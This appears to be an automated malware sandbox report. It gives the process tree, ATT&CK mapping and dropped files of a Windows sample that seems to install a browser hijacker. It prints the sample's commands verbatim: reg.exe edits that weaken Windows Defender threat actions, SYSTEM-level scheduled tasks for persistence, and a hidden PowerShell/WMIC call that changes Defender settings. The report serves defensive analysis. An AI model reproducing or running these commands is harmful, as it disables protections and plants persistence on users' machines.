C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵PID:1592
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵PID:708
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵PID:1912
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵PID:3284
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵PID:3864
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵PID:5064
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵PID:752
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵PID:5760
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵PID:5360
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵PID:2056
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "FPIEUdZLMYPzsiUNM" /SC once /ST 03:15:03 /RU "SYSTEM" /TR "\"C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\OZhxUQi.exe\" Wy /S" /V1 /F2⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:2208 -
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "FPIEUdZLMYPzsiUNM"2⤵PID:5224
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5316 -s 6082⤵
- Program crash
PID:1312
-
C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\OZhxUQi.exeC:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\OZhxUQi.exe Wy /S1⤵
- Checks computer location settings
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
PID:3556 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bEtnHIcecDUtXwQuWS"2⤵PID:6048
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &2⤵PID:4756
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"3⤵PID:4488
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True4⤵PID:664
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:6020 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True6⤵PID:2956
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\UQtSSXvqU\HWxvob.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "OcPshDNvhDnVmSv" /V1 /F2⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:5716 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "OcPshDNvhDnVmSv2" /F /xml "C:\Program Files (x86)\UQtSSXvqU\EplivAd.xml" /RU "SYSTEM"2⤵
- Scheduled Task/Job: Scheduled Task
PID:6004 -
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "OcPshDNvhDnVmSv"2⤵PID:4092
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "OcPshDNvhDnVmSv"2⤵PID:1324
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "qjEkZtbojbmFFd" /F /xml "C:\Program Files (x86)\AMqhlrBDqRJU2\wCaWHkT.xml" /RU "SYSTEM"2⤵
- Scheduled Task/Job: Scheduled Task
PID:4088 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "SzzOVfCIijTTD2" /F /xml "C:\ProgramData\CSlqozbqXBZGgaVB\xsPdrKy.xml" /RU "SYSTEM"2⤵
- Scheduled Task/Job: Scheduled Task
PID:3456 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "PiigmmnlzELKpVpJK2" /F /xml "C:\Program Files (x86)\OJBbginKvssDnbEKbsR\knrdzvi.xml" /RU "SYSTEM"2⤵
- Scheduled Task/Job: Scheduled Task
PID:2488 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "XrMInsNlrWTcBhRONQr2" /F /xml "C:\Program Files (x86)\hMiQKFvmPLjeC\bLbuwzk.xml" /RU "SYSTEM"2⤵
- Scheduled Task/Job: Scheduled Task
PID:1588 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "xRLZs1" /SC once /ST 02:04:30 /F /RU "Admin" /TR "\"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe\" --restore-last-session"2⤵
- Scheduled Task/Job: Scheduled Task
PID:3716 -
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "xRLZs1"2⤵PID:4516
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "xRLZs1"2⤵PID:2576
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "FPIEUdZLMYPzsiUNM"2⤵PID:2116
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3556 -s 20602⤵PID:4964
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 5316 -ip 53161⤵PID:3732
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 5828 -ip 58281⤵PID:2376
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 5828 -ip 58281⤵PID:656
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 5828 -ip 58281⤵PID:6020
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 5828 -ip 58281⤵PID:1832
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --restore-last-session1⤵
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of SendNotifyMessage
PID:3572 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffd200c3cb8,0x7ffd200c3cc8,0x7ffd200c3cd82⤵PID:656
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1940,1948266600832568998,12638398276600011796,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1596 /prefetch:22⤵PID:3796
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1940,1948266600832568998,12638398276600011796,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2092 /prefetch:32⤵PID:4460
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1940,1948266600832568998,12638398276600011796,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2716 /prefetch:82⤵PID:3568
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,1948266600832568998,12638398276600011796,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3184 /prefetch:12⤵PID:6096
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,1948266600832568998,12638398276600011796,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3192 /prefetch:12⤵PID:2016
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,1948266600832568998,12638398276600011796,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3552 /prefetch:12⤵PID:3976
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,1948266600832568998,12638398276600011796,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2500 /prefetch:12⤵PID:540
-
C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1940,1948266600832568998,12638398276600011796,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5716 /prefetch:82⤵PID:1588
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1940,1948266600832568998,12638398276600011796,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5572 /prefetch:82⤵PID:2576
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,1948266600832568998,12638398276600011796,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4632 /prefetch:12⤵PID:2284
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,1948266600832568998,12638398276600011796,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4036 /prefetch:12⤵PID:2976
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,1948266600832568998,12638398276600011796,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4072 /prefetch:12⤵PID:4668
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:2360
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:1448
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 716 -ip 7161⤵PID:2800
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 3184 -ip 31841⤵PID:3104
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 3556 -ip 35561⤵PID:3016
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --restore-last-session1⤵PID:920
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffd200c3cb8,0x7ffd200c3cc8,0x7ffd200c3cd82⤵PID:8
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2040,18104124565455389380,13213101510209559202,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2000 /prefetch:32⤵PID:1984
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 644 -p 2984 -ip 29841⤵PID:1912
Network
MITRE ATT&CK Enterprise v15
Execution
  Command and Scripting Interpreter: 1
    PowerShell: 1
  Scheduled Task/Job: 1
    Scheduled Task: 1
Persistence
  Boot or Logon Autostart Execution: 1
    Registry Run Keys / Startup Folder: 1
  Scheduled Task/Job: 1
    Scheduled Task: 1
Privilege Escalation
  Boot or Logon Autostart Execution: 1
    Registry Run Keys / Startup Folder: 1
  Scheduled Task/Job: 1
    Scheduled Task: 1
Defense Evasion
  Modify Registry: 2
  Subvert Trust Controls: 1
    Install Root Certificate: 1
Downloads
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hipilpceecbhfpflneijogboalilnfjp\1.3.3_0\_locales\be\messages.json
Filesize204B
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hipilpceecbhfpflneijogboalilnfjp\1.3.3_0\_locales\ca\messages.json
Filesize152B
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hipilpceecbhfpflneijogboalilnfjp\1.3.3_0\_locales\cs\messages.json
Filesize144B
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hipilpceecbhfpflneijogboalilnfjp\1.3.3_0\_locales\da\messages.json
Filesize153B
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hipilpceecbhfpflneijogboalilnfjp\1.3.3_0\_locales\de\messages.json
Filesize157B
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hipilpceecbhfpflneijogboalilnfjp\1.3.3_0\_locales\el\messages.json
Filesize197B
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hipilpceecbhfpflneijogboalilnfjp\1.3.3_0\_locales\en\messages.json
Filesize150B
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hipilpceecbhfpflneijogboalilnfjp\1.3.3_0\_locales\et\messages.json
Filesize127B
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hipilpceecbhfpflneijogboalilnfjp\1.3.3_0\_locales\fi\messages.json
Filesize133B
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hipilpceecbhfpflneijogboalilnfjp\1.3.3_0\_locales\fr\messages.json
Filesize190B
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hipilpceecbhfpflneijogboalilnfjp\1.3.3_0\_locales\hu\messages.json
Filesize156B
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hipilpceecbhfpflneijogboalilnfjp\1.3.3_0\_locales\it\messages.json
Filesize150B
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hipilpceecbhfpflneijogboalilnfjp\1.3.3_0\_locales\lt\messages.json
Filesize149B
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hipilpceecbhfpflneijogboalilnfjp\1.3.3_0\_locales\lv\messages.json
Filesize149B
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hipilpceecbhfpflneijogboalilnfjp\1.3.3_0\_locales\mk\messages.json
Filesize194B
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hipilpceecbhfpflneijogboalilnfjp\1.3.3_0\_locales\nl\messages.json
Filesize153B
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hipilpceecbhfpflneijogboalilnfjp\1.3.3_0\_locales\no\messages.json
Filesize152B
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hipilpceecbhfpflneijogboalilnfjp\1.3.3_0\_locales\pt_BR\messages.json
Filesize161B
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hipilpceecbhfpflneijogboalilnfjp\1.3.3_0\_locales\ru\messages.json
Filesize262B
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hipilpceecbhfpflneijogboalilnfjp\1.3.3_0\_locales\sk\messages.json
Filesize143B
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hipilpceecbhfpflneijogboalilnfjp\1.3.3_0\_locales\sl\messages.json
Filesize138B
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hipilpceecbhfpflneijogboalilnfjp\1.3.3_0\_locales\sq\messages.json
Filesize171B
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hipilpceecbhfpflneijogboalilnfjp\1.3.3_0\_locales\sv\messages.json
Filesize150B
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hipilpceecbhfpflneijogboalilnfjp\1.3.3_0\_locales\tr\messages.json
Filesize141B
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hipilpceecbhfpflneijogboalilnfjp\1.3.3_0\_locales\uk\messages.json
Filesize198B
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hipilpceecbhfpflneijogboalilnfjp\1.3.3_0\icons\ficon128.png
Filesize4KB
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hipilpceecbhfpflneijogboalilnfjp\1.3.3_0\icons\icon128.png
Filesize7KB
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hipilpceecbhfpflneijogboalilnfjp\1.3.3_0\icons\icon16.png
Filesize704B
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hipilpceecbhfpflneijogboalilnfjp\1.3.3_0\icons\icon48.png
Filesize2KB
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hipilpceecbhfpflneijogboalilnfjp\1.3.3_0\manifest.json
Filesize758B
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\64f17f6d-87c7-43b6-b9ba-775b326f5686.tmp
Filesize1B
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize288B
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize216B
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize408B
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\bnaebcjlolajbgllgjlmlfobobdemmki\3.8.26_0\_locales\es\messages.json
Filesize186B
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\MANIFEST-000001
Filesize41B
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index
Filesize72B
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe57f5aa.TMP
Filesize48B
-
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TempState\SearchHoverUnifiedTileModelCache.dat
Filesize
10KB
-
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TempState\~earchHoverUnifiedTileModelCache.tmp
Filesize
10KB
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202407160515091\additional_file0.tmp
Filesize
2.6MB
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ywkpx7r6.default-release\searchplugins\cdnsearch.xml
Filesize
1KB